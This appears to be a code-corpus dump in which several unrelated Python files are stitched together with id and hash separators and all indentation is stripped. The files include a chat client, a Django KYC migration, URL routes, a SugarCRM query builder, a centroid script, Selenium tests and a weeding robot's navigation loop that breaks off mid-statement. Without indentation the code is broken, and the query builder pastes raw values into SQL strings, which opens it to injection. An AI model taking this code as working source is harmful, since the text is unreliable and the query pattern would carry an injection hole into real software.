# key = "room"-ownerfinger-roomID
# value =
# closed participant list entry:
# key = "participant"-ownerfinger-roomID-participantfinger
# value = [ participantfinger ]
# closed message (one per recipient):
# key = "message"-roomid-fromfingerprint-tofingerprint-timestamp
# value =
#
import sys
import threading
import time
sys.path.append("../client")
import client
sys.path.append("../util")
import util
class Chat:
# nickname is my nickname for myself, e.g. "rtm".
def __init__(self, nickname, othernickname):
self.nickname = nickname
self.other = othernickname
# ask the DB service for new messages, once per second.
def poller(self):
c = client.Client(self.nickname)
ts1 = 0
while True:
ts2 = int(time.time())
k1 = str(ts1)
k2 = str(ts2)
# XXX should do one range() per participant.
rows = c.range("cmessage", frm=self.other, to=self.nickname, unique=[ k1, k2 ] )
for row in rows:
# row.value is [ timestamp, txt ]
timestamp = int(row.value[0])
txt = row.value[1]
if timestamp > ts1:
ts1 = timestamp
if row.nickname != c.nickname():
# only print messages that are not from us.
print("%s: %s" % (row.nickname, txt))
time.sleep(1)
# start a poller(), and read messages from the keyboard.
def go(self):
th = threading.Thread(target=lambda : self.poller())
th.daemon = True
th.start()
c = client.Client(self.nickname)
while True:
sys.stdout.write("%s-%s> " % (self.nickname, self.other))
sys.stdout.flush()
txt = sys.stdin.readline()
if txt == '':
break
txt = txt[0:-1]
if len(txt) > 0:
ts = str(int(time.time()))
# XXX should somehow include chat instance ID,
# XXX if more than one participant, once for each.
c.put([ ts, txt ],
'cmessage',
to=self.other,
unique=ts)
if __name__ == '__main__':
if len(sys.argv) == 4 and sys.argv[2] == "--new":
mynickname = sys.argv[1]
othernickname = sys.argv[3]
ch = Chat(mynickname, othernickname)
ch.go()
else:
sys.stderr.write("Usage: closedchat nickname --new othernickname\n")
sys.exit(1)
|
998,393 | 20a4782641a9d96d1cfa5fe31f0d7b8c933c9909 | # Generated by Django 3.0.7 on 2020-07-04 05:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('landing', '0002_dashboad_name'),
]
operations = [
migrations.CreateModel(
name='kyc',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(blank=True, max_length=100)),
('email', models.CharField(blank=True, max_length=100)),
('phone', models.CharField(blank=True, max_length=10)),
('pan', models.CharField(blank=True, max_length=15)),
('pan_image', models.ImageField(blank=True, upload_to='images/')),
('adhaar', models.CharField(blank=True, max_length=100)),
('adhaar_image', models.ImageField(blank=True, upload_to='images/')),
],
),
]
|
998,394 | 4aca9796ee33c4bfed3d9856aabba7928b319501 | from django.conf.urls import patterns, include, url
from django.contrib import admin
# from django.conf import settings
# from django.conf.urls.static import static
urlpatterns = patterns('',
# Examples:
url(r'^users/', include('patients.urls')),
url(r'^articles/', include('articles.urls')),
#url(r'^$', 'patients.views.home', name='home'),
url(r'^$', 'clinic.views.home', name='home'),
# url(r'^thank-you/$', 'patients.views.thankyou', name='thankyou'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^calendar/', include('calendars.urls')),
#user auth urls
url(r'^login/$', 'clinic.views.login'),
url(r'^auth/$', 'clinic.views.auth_view'),
url(r'^logout/$', 'clinic.views.logout'),
url(r'^loggedin/$', 'clinic.views.loggedin'),
url(r'^invalid/$', 'clinic.views.invalid_login'),
url(r'^register/$', 'clinic.views.register_user'),
url(r'^register_success/$', 'clinic.views.register_success'),
url(r'^doctors/$', 'clinic.views.doctors_view')
)
|
998,395 | ba1b3cdc3488e2ddeb485ecfc4bc097f20c8c101 | from __future__ import unicode_literals
import copy
import logging
from six.moves import html_parser
HTMLP = html_parser.HTMLParser()
log = logging.getLogger(__name__)
class QueryList:
"""Query a SugarCRM module for specific entries."""
def __init__(self, entry, query='', order_by='', limit='', offset='', fields=None, links_to_names=None):
"""Constructor for QueryList.
Keyword arguments:
entry -- SugarEntry object to query
query -- SQL query to be passed to the API
"""
self.model = entry
self._query = query
self._order_by = order_by
self._result_cache = None
self.low_mark, self.high_mark = 0, None # Used for offset/limit
self._limit = limit
self._offset = offset
self._total = -1
self._sent = 0
self._fields = fields
self._links_to_names = links_to_names
def __deepcopy__(self, memo):
"""Don't populate the QuerySet's cache."""
obj = self.__class__()
for k, v in self.__dict__.items():
if k == '_result_cache':
obj.__dict__[k] = None
else:
obj.__dict__[k] = copy.deepcopy(v, memo)
return obj
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, self.model.module_name)
def _fetch_all(self):
# run query
if self._result_cache is None:
result = self.model._search(self._query, self._order_by, self._offset, self._limit, self._fields,
self._links_to_names)
self._result_cache = result.get('entries', [])
def __len__(self):
if self._result_cache is None:
self._fetch_all()
return len(self._result_cache)
def __iter__(self):
self._fetch_all()
return iter(self._result_cache)
def __bool__(self):
self._fetch_all()
return bool(self._result_cache)
def __getitem__(self, k):
self.clear_limits()
"""Retrieve an item or slice from the set of results."""
if not isinstance(k, (int, slice)):
raise TypeError(
'QuerySet indices must be integers or slices, not %s.'
% type(k).__name__
)
assert ((not isinstance(k, slice) and (k >= 0)) or
(isinstance(k, slice) and (k.start is None or k.start >= 0) and
(k.stop is None or k.stop >= 0))), \
"Negative indexing is not supported."
if self._result_cache is not None:
return self._result_cache[k]
if isinstance(k, slice):
qs = self._chain()
if k.start is not None:
start = int(k.start)
else:
start = None
if k.stop is not None:
stop = int(k.stop)
else:
stop = None
qs.set_limits(start, stop)
qs._fetch_all()
return qs._result_cache[::k.step] if k.step else qs._result_cache
qs = self._chain()
qs.set_limits(k, k + 1)
qs._fetch_all()
return qs._result_cache[0]
def _chain(self, **kwargs):
"""
Return a copy of the current QuerySet that's ready for another
operation.
"""
obj = self._clone()
obj.__dict__.update(kwargs)
return obj
def _clone(self):
"""
Return a copy of the current QuerySet. A lightweight alternative
to deepcopy().
"""
return QueryList(self.model,
query=self._query,
order_by=self._order_by,
limit=self._limit,
offset=self._offset,
fields=self._fields,
links_to_names=self._links_to_names)
def set_limits(self, low=None, high=None):
"""
Adjust the limits on the rows retrieved. Use low/high to set these,
as it makes it more Pythonic to read and write. When the SQL query is
created, convert them to the appropriate offset and limit values.
Apply any limits passed in here to the existing constraints. Add low
to the current low value and clamp both to any existing high value.
"""
if high is not None:
if self.high_mark is not None:
self.high_mark = min(self.high_mark, self.low_mark + high)
else:
self.high_mark = self.low_mark + high
if low is not None:
if self.high_mark is not None:
self.low_mark = min(self.high_mark, self.low_mark + low)
else:
self.low_mark = self.low_mark + low
if self.low_mark == self.high_mark:
# clear limit offset
self.clear_limits()
if self.low_mark != self.high_mark:
self._limit, self._offset = self._get_limit_offset_params(self.low_mark, self.high_mark)
def clear_limits(self):
self._limit, self._offset = None, 0
@staticmethod
def _get_limit_offset_params(low_mark, high_mark):
offset = low_mark or 0
if high_mark is not None:
return (high_mark - offset), offset
return None, offset
def _build_query(self, **query):
"""Build the API query string.
"""
available_fields = list(self.model._available_fields.keys())
q_str = ''
for key, val in list(query.items()):
# Get the field and the operator from the query
key_field, key_sep, key_oper = key.partition('__')
if key_field == 'pk' and 'id' not in query:
key_field = 'id'
if key_field in available_fields:
if q_str != '':
q_str += ' AND '
if_cstm = ''
if key_field.endswith('_c'):
if_cstm = '_cstm'
field = self.model._table + if_cstm + '.' + key_field
if key_oper in ('exact', 'eq') or (not key_oper and not key_sep):
q_str += '%s = "%s"' % (field, val)
elif key_oper == 'contains':
q_str += '%s LIKE "%%%s%%"' % (field, val)
elif key_oper == 'startswith':
q_str += '%s LIKE "%s%%"' % (field, val)
elif key_oper == 'in':
q_str += '%s IN (' % field
for elem in val:
q_str += "'%s'," % elem
q_str = q_str.rstrip(',')
q_str += ')'
elif key_oper == 'gt':
q_str += '%s > "%s"' % (field, val)
elif key_oper == 'gte':
q_str += '%s >= "%s"' % (field, val)
elif key_oper == 'lt':
q_str += '%s < "%s"' % (field, val)
elif key_oper == 'lte':
q_str += '%s <= "%s"' % (field, val)
else:
raise LookupError('Unsupported operator')
return q_str
def get(self, **query):
qs = self.filter(**query)
num = len(qs)
if num == 1:
return qs.first()
if not num:
raise self.model.DoesNotExist(
"%s matching query does not exist." %
self.model.module_name
)
raise self.model.MultipleObjectsReturned(
'get() returned more than one %s -- it returned %s!' % (
self.model.module_name,
num,
)
)
def filter(self, **query):
"""Filter this QueryList, returning a new QueryList.
Keyword arguments:
query -- kwargs dictionary where the filters are specified:
The keys should be some of the entry's field names, suffixed by
'__' and one of the following operators: 'exact', 'contains', 'in',
'gt', 'gte', 'lt' or 'lte'. When the operator is 'in', the
corresponding value MUST be a list.
"""
if self._query != '':
query = '(%s) AND (%s)' % (self._query, self._build_query(**query))
else:
query = self._build_query(**query)
return QueryList(self.model,
query,
order_by=self._order_by,
limit=self._limit,
offset=self._offset,
fields=self._fields,
links_to_names=self._links_to_names)
def all(self):
return QueryList(self.model,
self._query,
order_by=self._order_by,
limit=self._limit,
offset=self._offset,
fields=self._fields,
links_to_names=self._links_to_names)
def exclude(self, **query):
"""Filter this QueryList, returning a new QueryList, as in filter(),
but excluding the entries that match the query.
"""
if self._query != '':
query = '(%s) AND NOT (%s)' % (self._query, self._build_query(**query))
else:
query = 'NOT (%s)' % self._build_query(**query)
return QueryList(self.model,
query,
order_by=self._order_by,
fields=self._fields,
limit=self._limit,
offset=self._offset,
links_to_names=self._links_to_names)
def remove_invalid_fields(self, fields):
valid_fields = []
available_fields = list(self.model._available_fields.keys())
for field in fields:
if field in available_fields:
valid_fields.append(field)
return valid_fields
def _get_ordering_field(self, value):
desc = False
field_name = value
if field_name.startswith('-'):
desc = True
field_name = field_name[1:]
if field_name == 'pk':
field_name = 'id'
valid_fields = self.remove_invalid_fields([field_name, ])
if field_name in valid_fields:
return field_name, desc
return None, None
def order_by(self, value):
field_name, desc = self._get_ordering_field(value)
order_by = self._order_by
if field_name is not None:
order_by = field_name
if desc:
order_by = f'{order_by} desc'
return QueryList(self.model,
self._query,
order_by=order_by,
fields=self._fields,
limit=self._limit,
offset=self._offset,
links_to_names=self._links_to_names)
def count(self):
if self._total == -1:
result = self.model._connection.get_entries_count(self.model.module_name, self._query, 0)
self._total = int(result['result_count'], 10)
return self._total
def first(self):
if self._result_cache is None:
self._fetch_all()
for obj in self._result_cache[:1]:
return obj
def only(self, *_fields):
fields = self._fields
valid_fields = self.remove_invalid_fields(_fields)
if valid_fields:
fields = valid_fields
return QueryList(self.model,
self._query,
order_by=self._order_by,
fields=fields,
limit=self._limit,
offset=self._offset,
links_to_names=self._links_to_names)
def links_to_names(self, *_links_to_names):
links_to_names = self._links_to_names
if _links_to_names:
links_to_names = _links_to_names
return QueryList(self.model,
self._query,
order_by=self._order_by,
fields=self._fields,
limit=self._limit,
offset=self._offset,
links_to_names=links_to_names)
|
998,396 | bf1b45754da2311af2110e1cfe024c8a98e63089 | import sys
import math
import numpy as np
import scipy
import scipy.stats
from scipy.stats import zscore
from scipy.spatial.distance import euclidean, squareform, pdist
import pandas as pd
from scipy.cluster.vq import kmeans2
import image_processing
def read_cell_type(n):
f = open(n)
m = {}
pt = 1
for l in f:
l = l.rstrip("\n").split(" ")
cl = int(l[0])
m[pt] = cl
pt+=1
f.close()
ma = np.arange(len(m)+1)
ma[0] = -1
for k in m:
ma[int(k)] = m[k]
return ma
def norm_centroid(cent):
scale_factor = 2000/4
cent[:,0] = (cent[:,0] - float(1000)) / float(500)
cent[:,1] = (cent[:,1] - float(-1000)) / float(500)
return cent
def read_centroid(n):
f = open(n)
f.readline()
num_cell = 0
for l in f:
l = l.rstrip("\n")
num_cell+=1
f.close()
Xcen = np.empty((num_cell, 2), dtype="float32")
field = np.empty((num_cell), dtype="int32")
f = open(n)
f.readline()
ind = 0
for l in f:
l = l.rstrip("\n")
ll = l.split(",")
Xcen[ind,:] = [float(ll[-2]), float(ll[-1])]
field[ind] = int(ll[0])
ind+=1
f.close()
return Xcen, field
if __name__=="__main__":
Xcen, field = read_centroid("../Cell_centroids.csv")
Xcen2 = np.empty(Xcen.shape, dtype="float32")
for i in range(Xcen.shape[0]):
this_x = Xcen[i,0]
this_y = Xcen[i,1] * -1.0
new_x = this_y + (2048 - 1.0)
new_y = this_x
Xcen2[i,:] = [new_x, new_y]
Xcen = Xcen2
'''
offset = {}
offset[0] = (0,2048)
offset[1] = (2048, 2048)
offset[2] = (offset[1][0]+2048, 2048)
offset[3] = (offset[2][0]+2048, 2048)
offset[4] = (offset[3][0]+675, 0)
'''
offset = image_processing.read_offset("offset.txt")
for i in range(Xcen.shape[0]):
t_field = field[i]
if t_field>=5: continue
final_x = Xcen[i,0] + offset[t_field][0]
final_y = Xcen[i,1] + offset[t_field][1]
sys.stdout.write("%d,%d,%.1f,%.1f\n" % (i+1, 100, final_x, final_y))
|
998,397 | 8ed301e812afd7bf7e033aa2905f5e268ee4a975 | from .base import FunctionalTest
class CreateAccountTest(FunctionalTest):
def test_login(self):
self.browser.get(self.live_server_url)
# go to login page
self.browser.find_element_by_id("login-button").click()
# fill in login data
self.browser.find_element_by_id("id_username").send_keys("opak")
self.browser.find_element_by_id("id_password").send_keys("test")
# login account
self.browser.find_element_by_css_selector("input.btn.btn-primary").click()
def test_create_account(self):
self.browser.get(self.live_server_url)
# go to register page
self.browser.find_element_by_id("registration-button").click()
# fill in registration data
self.browser.find_element_by_id("id_username").send_keys("test_user10")
self.browser.find_element_by_id("id_password").send_keys("testing1234")
self.browser.find_element_by_id("id_password2").send_keys("testing1234")
# finish registration
self.browser.find_element_by_css_selector("input.btn.btn-primary").click()
# go to login page
self.browser.find_element_by_id("login-link").click()
# fill in login data
self.browser.find_element_by_id("id_username").send_keys("test_user10")
self.browser.find_element_by_id("id_password").send_keys("testing1234")
# login account
self.browser.find_element_by_css_selector("input.btn.btn-primary").click()
|
998,398 | b8dea4227f5b3ce9665d27bb7a558c1bac6fe006 | """Spiral movement, detection and extraction over given by ABCD points area
BE SURE TO IMPORT ANY NATUITION MODULES AFTER AND ONLY AFTER(!) CONFIG.PY LOADING!
This is required to prevent modules loading corrupted config before main resolves this problem.
"""
import threading
import os
import sys
from turtle import speed
import time
import traceback
from matplotlib.patches import Polygon
import math
import cv2 as cv
import numpy as np
import pickle
import posix_ipc
import json
import glob
import importlib
import subprocess
import datetime
import shutil
import pytz
# load config, if failed - copy and load config backups until success or no more backups
def is_config_empty(config_full_path: str):
with open(config_full_path, "r") as config_file:
for line in config_file:
if line not in ["", "\n"]:
return False
return True
try:
if not os.path.isfile("config/config.py"):
raise Exception("config file is not exist")
if is_config_empty("config/config.py"):
raise Exception("config file is empty")
from config import config
except KeyboardInterrupt:
raise KeyboardInterrupt
except Exception as exc:
print(f"Failed to load current config.py! ({str(exc)})")
# load config backups
config_backups = [path for path in glob.glob(
"configBackup/*.py") if "config" in path]
for i in range(len(config_backups)):
ds = config_backups[i].split("_")[1:] # date structure
ds.extend(ds.pop(-1).split(":"))
ds[-1] = ds[-1][:ds[-1].find(".")]
config_backups[i] = [
config_backups[i],
datetime.datetime(
day=int(ds[0]),
month=int(ds[1]),
year=int(ds[2]),
hour=int(ds[3]),
minute=int(ds[4]),
second=int(ds[5])
).timestamp()
]
# make last backups to be placed and used first
config_backups.sort(key=lambda item: item[1], reverse=True)
# try to find and set as current last valid config
for config_backup in config_backups:
try:
os.rename(
"config/config.py",
f"config/ERROR_{datetime.datetime.now(pytz.timezone('Europe/Berlin')).strftime('%d-%m-%Y %H-%M-%S %f')}"
f"_config.py")
shutil.copy(config_backup[0], "config/config.py")
if is_config_empty("config/config.py"):
raise Exception("config file is empty")
from config import config
print("Successfully loaded config:", config_backup[0])
break
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
pass
else:
print("Couldn't find proper 'config.py' file in 'config' and 'configBackup' directories!")
exit()
import adapters
import navigation
import utility
import detection
import stubs
import extraction
import datacollection
from extraction import ExtractionManagerV3
from notification import RobotStates
from notification import NotificationClient
import connectors
"""
import SensorProcessing
import socketForRTK
from socketForRTK.Client import Client
"""
"""
if config.RECEIVE_FIELD_FROM_RTK:
# import robotEN_JET as rtk
import robotEN_JETSON as rtk
"""
# TODO: temp debug counter
IMAGES_COUNTER = 0
def load_coordinates(file_path):
positions_list = []
with open(file_path) as file:
for line in file:
if line != "":
positions_list.append(list(map(float, line.split(" "))))
return positions_list
def save_gps_coordinates(points: list, file_name: str):
"""
Saves given list of points using QGIS format
:param points:
:param file_name:
:return:
"""
with open(file_name, "w") as file:
for point in points:
if isinstance(point[0], list):
str_point = str(point[0][0]) + " " + \
str(point[0][1]) + " " + str(point[1]) + "\n"
else:
str_point = str(point[0]) + " " + str(point[1]) + "\n"
file.write(str_point)
def save_gps_coordinates_raw(points: list, file_name: str):
"""
Saves given list of points as raw text
:param points:
:param file_name:
:return:
"""
with open(file_name, "w") as file:
for point in points:
file.write(str(point) + "\n")
def ask_for_ab_points(gps: adapters.GPSUbloxAdapter):
"""Ask user for moving vector AB points"""
input("Press enter to save point B")
point_b = gps.get_fresh_position()
print("Point B saved.")
input("Press enter to save point A")
point_a = gps.get_fresh_position()
print("Point A saved.")
return [point_a, point_b]
def save_image(path_to_save, image, counter, session_label, date, sep="_"):
"""
Assembles image file name and saves received image under this name to specified directory.
Counter and session label may be passed if was set to None.
"""
date = sep + date if date else ""
session_label = sep + session_label if session_label else ""
counter = sep + str(counter) if counter or counter == 0 else ""
cv.imwrite(path_to_save + date + session_label + counter + ".jpg", image)
def debug_save_image(img_output_dir, label, frame, plants_boxes, undistorted_zone_radius, poly_zone_points_cv):
# TODO: temp counter debug
global IMAGES_COUNTER
IMAGES_COUNTER += 1
# TODO: data gathering temporary hardcoded
if config.ALLOW_GATHERING:
save_image(config.DATA_GATHERING_DIR, frame, IMAGES_COUNTER,
label, utility.get_current_time())
# debug image saving
if config.SAVE_DEBUG_IMAGES:
# draw time on frame
cur_time = utility.get_current_time()
left, top = 30, 30
label_size, base_line = cv.getTextSize(
cur_time + " No: " + str(IMAGES_COUNTER), cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)
top = max(top, label_size[1])
frame = cv.rectangle(frame, (left, top - round(1.5 * label_size[1])),
(left + round(1.5 *
label_size[0]), top + base_line),
(0, 0, 255), cv.FILLED)
frame = cv.putText(frame, cur_time + " No: " + str(IMAGES_COUNTER), (left, top), cv.FONT_HERSHEY_SIMPLEX, 0.75,
(0, 0, 0), 2)
# draw data on frame
frame = utility.ImageSaver.draw_zone_circle(
frame, config.SCENE_CENTER_X, config.SCENE_CENTER_Y, undistorted_zone_radius)
frame = utility.ImageSaver.draw_zone_poly(frame, poly_zone_points_cv)
frame = detection.draw_boxes(frame, plants_boxes)
save_image(img_output_dir, frame, IMAGES_COUNTER, label, cur_time)
def move_to_point_and_extract(coords_from_to: list,
gps: adapters.GPSUbloxAdapter,
vesc_engine: adapters.VescAdapterV4,
smoothie: adapters.SmoothieAdapter,
camera: adapters.CameraAdapterIMX219_170,
periphery_det: detection.YoloOpenCVDetection,
precise_det: detection.YoloOpenCVDetection,
logger_full: utility.Logger,
report_field_names,
trajectory_saver: utility.TrajectorySaver,
working_zone_polygon,
img_output_dir,
nav: navigation.GPSComputing,
data_collector: datacollection.DataCollector,
log_cur_dir,
image_saver: utility.ImageSaver,
notification: NotificationClient,
extraction_manager_v3: ExtractionManagerV3,
ui_msg_queue: posix_ipc.MessageQueue,
SI_speed: float,
wheels_straight: bool,
navigation_prediction: navigation.NavigationPrediction,
future_points: list,
allow_extractions: bool,
x_scan_poly: list,
cur_field):
"""
Moves to the given target point and extracts all weeds on the way.
:param coords_from_to:
:param gps:
:param vesc_engine:
:param smoothie:
:param camera:
:param periphery_det:
:param precise_det:
:param logger_full:
:param report_field_names:
:param trajectory_saver:
:param working_zone_polygon:
:param img_output_dir:
:param nav:
:param data_collector:
:param log_cur_dir:
:param image_saver:
:param notification:
:param extraction_manager_v3:
:param cur_field: None or list of 4 ABCD points which are describing current field robot is working on.
:return:
"""
if config.ALLOW_FIELD_LEAVING_PROTECTION and cur_field is not None and len(cur_field) > 2:
enable_field_leaving_protection = True
else:
enable_field_leaving_protection = False
if config.ALLOW_FIELD_LEAVING_PROTECTION:
if cur_field is None:
msg = f"WARNING: robot field leaving protection WILL NOT WORK as given field is None"
print(msg)
logger_full.write(msg)
elif len(cur_field) < 3:
msg = f"WARNING: robot field leaving protection WILL NOT WORK as given field contains " \
f"{len(cur_field)} points (required ar least 3 points)"
print(msg)
logger_full.write(msg)
extract = SI_speed > 0 and allow_extractions
vesc_speed = SI_speed * config.MULTIPLIER_SI_SPEED_TO_RPM
speed_fast = config.SI_SPEED_FAST * config.MULTIPLIER_SI_SPEED_TO_RPM
vesc_speed_fast = speed_fast if SI_speed >= 0 else -speed_fast
navigation_prediction.set_SI_speed(SI_speed)
raw_angles_history = []
detections_period = []
navigations_period = []
stop_helping_point = nav.get_coordinate(
coords_from_to[1], coords_from_to[0], 90, 1000)
learn_go_straight_index = 0
learn_go_straight_history = []
last_skipped_point = coords_from_to[0]
start_Nav_while = True
last_correct_raw_angle = 0
point_status = "origin"
last_corridor_side = 0
current_corridor_side = 1
almost_start = 0
prev_maneuver_time = time.time()
working_mode_slow = 1
working_mode_fast = 2
working_mode_switching = 3
current_working_mode = working_mode_slow
last_working_mode = 0
# True if robot is close to one of current movement vector points, False otherwise; False if speed limit near points is disabled
close_to_end = config.USE_SPEED_LIMIT
bumper_is_pressed = None
# message queue sending temporary performance tracker
if config.QUEUE_TRACK_PERFORMANCE:
ui_msg_queue_perf = {
"max_time": 0,
"min_time": float("inf"),
"total_time": 0,
"total_sends": 0,
"timeouts_exceeded": 0
}
# x movements during periphery scans
x_scan_cur_idx = 0
x_scan_idx_increasing = True
# set camera to the Y min
res = smoothie.custom_separate_xy_move_to(X_F=config.X_F_MAX,
Y_F=config.Y_F_MAX,
X=smoothie.smoothie_to_mm(
(config.X_MAX - config.X_MIN) / 2, "X"),
Y=smoothie.smoothie_to_mm(config.Y_MIN, "Y"))
if res != smoothie.RESPONSE_OK:
msg = "INIT: Failed to move camera to Y min, smoothie response:\n" + res
logger_full.write(msg + "\n")
smoothie.wait_for_all_actions_done()
# TODO: maybe should add sleep time as camera currently has delay
if config.AUDIT_MODE:
vesc_engine.set_target_rpm(vesc_speed, vesc_engine.PROPULSION_KEY)
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
try:
notificationQueue = posix_ipc.MessageQueue(
config.QUEUE_NAME_UI_NOTIFICATION)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
notificationQueue = None
degraded_navigation_mode = False
number_navigation_cycle_without_gps = 0
point_reading_t = last_send_gps_time = slow_mode_time = time.time()
have_time_for_inference = True
predictor_next_gps_expected_ts = float("inf")
# main navigation control loop
while True:
# gps point reading time predictor
if have_time_for_inference and config.ALLOW_GPS_TIME_PREDICTIONS_LIMITING_INFERENCE:
if time.time() + config.INFERENCE_MAX_TICK_TIME > predictor_next_gps_expected_ts:
have_time_for_inference = False
if have_time_for_inference:
# EXTRACTION CONTROL
start_t = time.time()
frame = camera.get_image()
frame_t = time.time()
per_det_start_t = time.time()
if extract:
plants_boxes = periphery_det.detect(frame)
else:
plants_boxes = list()
per_det_end_t = time.time()
detections_period.append(per_det_end_t - start_t)
if config.SAVE_DEBUG_IMAGES:
image_saver.save_image(
frame,
img_output_dir,
label="PE_view_M=" + str(current_working_mode),
plants_boxes=plants_boxes)
if config.ALLOW_GATHERING and current_working_mode == working_mode_slow and \
image_saver.get_counter("gathering") < config.DATA_GATHERING_MAX_IMAGES:
image_saver.save_image(frame, config.DATA_GATHERING_DIR,
plants_boxes=plants_boxes, counter_key="gathering")
if extract:
msg = "View frame time: " + str(frame_t - start_t) + "\t\tPeri. det. time: " + \
str(per_det_end_t - per_det_start_t)
else:
msg = "View frame time: " + str(frame_t - start_t) + "\t\tPeri. det. (extractions are off) time: " + \
str(per_det_end_t - per_det_start_t)
logger_full.write(msg + "\n")
# MOVEMENT AND ACTIONS MODES
if config.AUDIT_MODE:
dc_start_t = time.time()
# count detected plant boxes for each type
plants_count = dict()
for plant_box in plants_boxes:
plant_box_name = plant_box.get_name()
if plant_box_name in plants_count:
plants_count[plant_box_name] += 1
else:
plants_count[plant_box_name] = 1
# save info into data collector
for plant_label in plants_count:
data_collector.add_detections_data(plant_label,
math.ceil((plants_count[plant_label]) / config.AUDIT_DIVIDER))
# flush updates into the audit output file and log measured time
if len(plants_boxes) > 0:
data_collector.save_all_data(
log_cur_dir + config.AUDIT_OUTPUT_FILE)
dc_t = time.time() - dc_start_t
msg = "Last scan weeds detected: " + str(len(plants_boxes)) + \
", audit processing tick time: " + str(dc_t)
logger_full.write(msg + "\n")
else:
# slow mode
if current_working_mode == working_mode_slow:
if last_working_mode != current_working_mode:
last_working_mode = current_working_mode
msg = "[Working mode] : slow"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
if ExtractionManagerV3.any_plant_in_zone(
plants_boxes,
x_scan_poly[x_scan_cur_idx] if config.ALLOW_X_MOVEMENT_DURING_SCANS else working_zone_polygon):
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
if config.VERBOSE_EXTRACT:
msg = "[VERBOSE EXTRACT] Stopping the robot because we have detected plant(s)."
logger_full.write_and_flush(msg+"\n")
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
# TODO this 0 rpm "movement" is to prevent robot movement during extractions, need to add this in future to rest speed modes too
vesc_engine.set_time_to_move(config.VESC_MOVING_TIME, vesc_engine.PROPULSION_KEY)
vesc_engine.set_target_rpm(0, vesc_engine.PROPULSION_KEY)
vesc_engine.set_current_rpm(0, vesc_engine.PROPULSION_KEY)
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
# TODO remove thread init from here!
voltage_thread = threading.Thread(
target=send_voltage_thread_tf,
args=(vesc_engine, ui_msg_queue),
daemon=True)
voltage_thread.start()
# single precise center scan before calling for PDZ scanning and extractions
if config.ALLOW_PRECISE_SINGLE_SCAN_BEFORE_PDZ and not config.ALLOW_X_MOVEMENT_DURING_SCANS:
time.sleep(config.DELAY_BEFORE_2ND_SCAN)
frame = camera.get_image()
plants_boxes = precise_det.detect(frame)
# do PDZ scan and extract all plants if single precise scan got plants in working area
if ExtractionManagerV3.any_plant_in_zone(plants_boxes, working_zone_polygon):
if config.EXTRACTION_MODE == 1:
extraction_manager_v3.extract_all_plants()
elif config.EXTRACTION_MODE == 2:
extraction_manager_v3.mill_all_plants()
slow_mode_time = time.time()
else:
if config.EXTRACTION_MODE == 1:
extraction_manager_v3.extract_all_plants()
elif config.EXTRACTION_MODE == 2:
extraction_manager_v3.mill_all_plants()
slow_mode_time = time.time()
if config.VERBOSE_EXTRACT:
msg = "[VERBOSE EXTRACT] Extract cycle are finish."
logger_full.write_and_flush(msg+"\n")
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
msg = "Applying force step forward after extractions cycle(s)"
logger_full.write(msg + "\n")
if config.VERBOSE:
print(msg)
vesc_engine.set_time_to_move(config.STEP_FORWARD_TIME, vesc_engine.PROPULSION_KEY)
vesc_engine.set_target_rpm(
config.SI_SPEED_STEP_FORWARD * config.MULTIPLIER_SI_SPEED_TO_RPM,
vesc_engine.PROPULSION_KEY)
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
vesc_engine.wait_for_stop(vesc_engine.PROPULSION_KEY)
elif config.SLOW_FAST_MODE and time.time() - slow_mode_time > config.SLOW_MODE_MIN_TIME:
# move cork to fast mode scan position
if config.VERBOSE:
msg = "SLOW MODE: moving cork to fast mode position\n"
logger_full.write(msg)
res = smoothie.custom_separate_xy_move_to(
X_F=config.X_F_MAX,
Y_F=config.Y_F_MAX,
X=smoothie.smoothie_to_mm(
(config.X_MAX - config.X_MIN) / 2, "X"),
Y=smoothie.smoothie_to_mm((config.Y_MAX - config.Y_MIN) * config.SLOW_FAST_MODE_HEAD_FACTOR,
"Y"))
if res != smoothie.RESPONSE_OK:
msg = "INIT: Keeping in slow mode as failed to move camera to fast mode scan position, smoothie's response:\n" + res
logger_full.write(msg + "\n")
else:
msg = "Switching from 'slow mode' to 'switching mode'"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
current_working_mode = working_mode_switching
# TODO a bug: will not start moving if config.SLOW_MODE_MIN_TIME == 0 or too low (switch speed applies right after slow mode weeds extractions)
if not vesc_engine.is_moving(vesc_engine.PROPULSION_KEY):
vesc_engine.set_time_to_move(config.VESC_MOVING_TIME, vesc_engine.PROPULSION_KEY)
vesc_engine.set_target_rpm(vesc_speed, vesc_engine.PROPULSION_KEY)
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
# switching (from slow to fast) mode
elif current_working_mode == working_mode_switching:
if last_working_mode != current_working_mode:
last_working_mode = current_working_mode
msg = "[Working mode] : switching to fast"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
if ExtractionManagerV3.any_plant_in_zone(
plants_boxes,
x_scan_poly[x_scan_cur_idx] if config.ALLOW_X_MOVEMENT_DURING_SCANS else working_zone_polygon):
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
if config.VERBOSE:
msg = "Moving cork to slow mode scan position\n"
logger_full.write(msg)
# smoothie.wait_for_all_actions_done()
res = smoothie.custom_separate_xy_move_to(
X_F=config.X_F_MAX,
Y_F=config.Y_F_MAX,
X=smoothie.smoothie_to_mm(
(config.X_MAX - config.X_MIN) / 2, "X"),
Y=smoothie.smoothie_to_mm(config.Y_MIN, "Y"))
if res != smoothie.RESPONSE_OK:
